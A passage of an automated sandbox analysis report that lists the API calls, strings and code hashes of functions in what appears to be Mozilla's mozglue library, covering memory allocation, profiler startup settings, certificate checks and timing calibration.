                                                                                                      • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                      • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                      • API String ID: 3686969729-1266492768
                                                                                                      • Opcode ID: efa98bc6f8aa79758231369a9b2ae76132544f6babb32abbdf0c5a5ef592b6bd
                                                                                                      • Instruction ID: 9cdba52af97d50978f02bcbef490cafd4246ef1ad79d910f3f3d0a5a82a0167c
                                                                                                      • Opcode Fuzzy Hash: efa98bc6f8aa79758231369a9b2ae76132544f6babb32abbdf0c5a5ef592b6bd
                                                                                                      • Instruction Fuzzy Hash: 5E2201B5908B00DFEB009FF5881576ABBB4AF47348F044529F85A97B81EB31D94ACB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CFA6CCC
                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CFA6D11
                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6CFA6D26
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CFA6D35
                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CFA6D53
                                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CFA6D73
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA6D80
                                                                                                      • CertGetNameStringW.CRYPT32 ref: 6CFA6DC0
                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6CFA6DDC
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CFA6DEB
                                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CFA6DFF
                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CFA6E10
                                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6CFA6E27
                                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CFA6E34
                                                                                                      • CreateFileW.KERNEL32 ref: 6CFA6EF9
                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6CFA6F7D
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CFA6F8C
                                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CFA709D
                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CFA7103
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA7153
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFA7176
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA7209
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA723A
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA726B
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA729C
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA72DC
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA730D
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CFA73C2
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA73F3
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA73FF
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA7406
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA740D
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CFA741A
                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6CFA755A
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFA7568
                                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CFA7585
                                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CFA7598
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA75AC
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                      • API String ID: 3256780453-3980470659
                                                                                                      • Opcode ID: 25d53f720e658468b3ade5a535ef0fe9aa0200abf63e265ba0146b7b9f7f6958
                                                                                                      • Instruction ID: 3c680a9c11352a74da59ea670855383536b04e149ad6a6070f70228647a628ce
                                                                                                      • Opcode Fuzzy Hash: 25d53f720e658468b3ade5a535ef0fe9aa0200abf63e265ba0146b7b9f7f6958
                                                                                                      • Instruction Fuzzy Hash: 0352D3B2900315DFEB21DFA4CC85FAAB7BCEF46704F10419AE919A7640DB70AA85CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFC7019
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7DC), ref: 6CFC7061
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFC71A4
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC721D
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFC723E
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFC726C
                                                                                                      • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6CFC72B2
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC733F
                                                                                                      • EnterCriticalSection.KERNEL32(0000000C), ref: 6CFC73E8
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC961C
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFC9622
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC9642
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC964F
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC96CE
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC96DB
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01E804), ref: 6CFC9747
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFC9792
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFC97A5
                                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6D01E810,00000040), ref: 6CFC97CF
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E7B8,00001388), ref: 6CFC9838
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E744,00001388), ref: 6CFC984E
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E784,00001388), ref: 6CFC9874
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E7DC,00001388), ref: 6CFC9895
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CFC9993
                                                                                                      • <jemalloc>, xrefs: 6CFC9B33, 6CFC9BE3
                                                                                                      • : (malloc) Unsupported character in malloc options: ', xrefs: 6CFC9BF4
                                                                                                      • Compile-time page size does not divide the runtime one., xrefs: 6CFC9B38
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFC99A8
                                                                                                      • MALLOC_OPTIONS, xrefs: 6CFC97CA
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFC99BD
                                                                                                      • MOZ_CRASH(), xrefs: 6CFC9B42
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFC9933, 6CFC9A33, 6CFC9A4E
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFC99D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 4047164644-4173974723
                                                                                                      • Opcode ID: dcc8594ee2479b41a9fffdde7d50af58666c2f2166854b040a36b879a5f5572a
                                                                                                      • Instruction ID: 8b39b1e450350d90564345cbb94deaf6b1898fdc405aa8f746caf008097d908e
                                                                                                      • Opcode Fuzzy Hash: dcc8594ee2479b41a9fffdde7d50af58666c2f2166854b040a36b879a5f5572a
                                                                                                      • Instruction Fuzzy Hash: DE535F72B057028FD704CF29C581716BBE1BF85328F29C66EE8699B791D771E841CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD0F1F
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD0F99
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFD0FB7
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD0FE9
                                                                                                      • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CFD1031
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD10D0
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD117D
                                                                                                      • memset.VCRUNTIME140(?,000000E5,?), ref: 6CFD1C39
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E744), ref: 6CFD3391
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E744), ref: 6CFD33CD
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD3431
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFD3437
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CFD3793
                                                                                                      • <jemalloc>, xrefs: 6CFD3941, 6CFD39F1
                                                                                                      • : (malloc) Unsupported character in malloc options: ', xrefs: 6CFD3A02
                                                                                                      • Compile-time page size does not divide the runtime one., xrefs: 6CFD3946
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFD37A8
                                                                                                      • MALLOC_OPTIONS, xrefs: 6CFD35FE
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFD37BD
                                                                                                      • MOZ_CRASH(), xrefs: 6CFD3950
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFD3559, 6CFD382D, 6CFD3848
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFD37D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 3040639385-4173974723
                                                                                                      • Opcode ID: 4da6d35e7993cdcf085f2fc68247a132e974c57c8c1dc35bcf4f155af494b56f
                                                                                                      • Instruction ID: f96d78a87210c012c222e05c4d227d8177338d9a9b7ede3420b179302bdea8f6
                                                                                                      • Opcode Fuzzy Hash: 4da6d35e7993cdcf085f2fc68247a132e974c57c8c1dc35bcf4f155af494b56f
                                                                                                      • Instruction Fuzzy Hash: 3C534972A056028FD704CF29C540716BBF1BF8A328F2EC66DE8699B791D771E845CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3527
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF355B
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF35BC
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF35E0
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF363A
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3693
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF36CD
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3703
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF373C
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3775
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF378F
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3892
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF38BB
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3902
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3939
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3970
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF39EF
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3A26
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3AE5
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3E85
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3EBA
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3EE2
                                                                                                        • Part of subcall function 6CFF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CFF61DD
                                                                                                        • Part of subcall function 6CFF6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CFF622C
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF40F9
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF412F
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4157
                                                                                                        • Part of subcall function 6CFF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CFF6250
                                                                                                        • Part of subcall function 6CFF6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFF6292
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF441B
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4448
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF484E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4863
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4878
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4896
                                                                                                      • free.MOZGLUE ref: 6CFF489F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: floor$free$malloc$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3842999660-3916222277
                                                                                                      • Opcode ID: 12bf7db456867290cf583712ee8b4b37e83258e6dad93fc790acc2950406a537
                                                                                                      • Instruction ID: 923534ad5addaeb9413f490f090c52c5eed6e377c9a3eced307953e0d594dae9
                                                                                                      • Opcode Fuzzy Hash: 12bf7db456867290cf583712ee8b4b37e83258e6dad93fc790acc2950406a537
                                                                                                      • Instruction Fuzzy Hash: 0DF24A75908B808FC725CF28C18469AFBF5FFCA314F118A5ED99997721DB719882CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CFA64DF
                                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CFA64F2
                                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CFA6505
                                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CFA6518
                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CFA652B
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFA671C
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA6724
                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CFA672F
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6CFA6759
                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CFA6764
                                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CFA6A80
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFA6ABE
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA6AD3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA6AE8
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA6AF7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                      • API String ID: 487479824-2878602165
                                                                                                      • Opcode ID: 93dc297927600c78c77ca1f816bbdabab2be97cac6d9a0009b51dd77f72b9f17
                                                                                                      • Instruction ID: c027dc9672c47b4527b5c27e09676e0f16513757ac7e8e2b15c945d884d74356
                                                                                                      • Opcode Fuzzy Hash: 93dc297927600c78c77ca1f816bbdabab2be97cac6d9a0009b51dd77f72b9f17
                                                                                                      • Instruction Fuzzy Hash: 63F1F471905219DFDB20CFA8CC48B9AF7B5AF0A318F144299E819E3681D731AE86CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01F688,00001000), ref: 6CF935D5
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CF935E0
                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6CF935FD
                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CF9363F
                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CF9369F
                                                                                                      • __aulldiv.LIBCMT ref: 6CF936E4
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6CF93773
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CF9377E
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CF937BD
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6CF937C4
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CF937CB
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CF93801
                                                                                                      • __aulldiv.LIBCMT ref: 6CF93883
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CF93902
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CF93918
                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CF9394C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                      • API String ID: 301339242-3790311718
                                                                                                      • Opcode ID: e7b4076d92fd01580599760bdb592aea0cb065e8e24936d9a7b49c6f95020195
                                                                                                      • Instruction ID: 1a155126dec493af969c1f56e5a1a0b876d8e84e469e350bfc6c9fc04cbab1be
                                                                                                      • Opcode Fuzzy Hash: e7b4076d92fd01580599760bdb592aea0cb065e8e24936d9a7b49c6f95020195
                                                                                                      • Instruction Fuzzy Hash: 9BB1A672A093109FEB08DFA9CC5671ABBF9FB8A704F05852DE4A9D3790D7709904CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFC5F9
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFC6FB
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CFFC74D
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CFFC7DE
                                                                                                      • memset.VCRUNTIME140(?,00000000,00004014), ref: 6CFFC9D5
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFCC76
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFCD7A
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFDB40
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFDB62
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFDB99
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CFFDD8B
                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CFFDE95
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFFE360
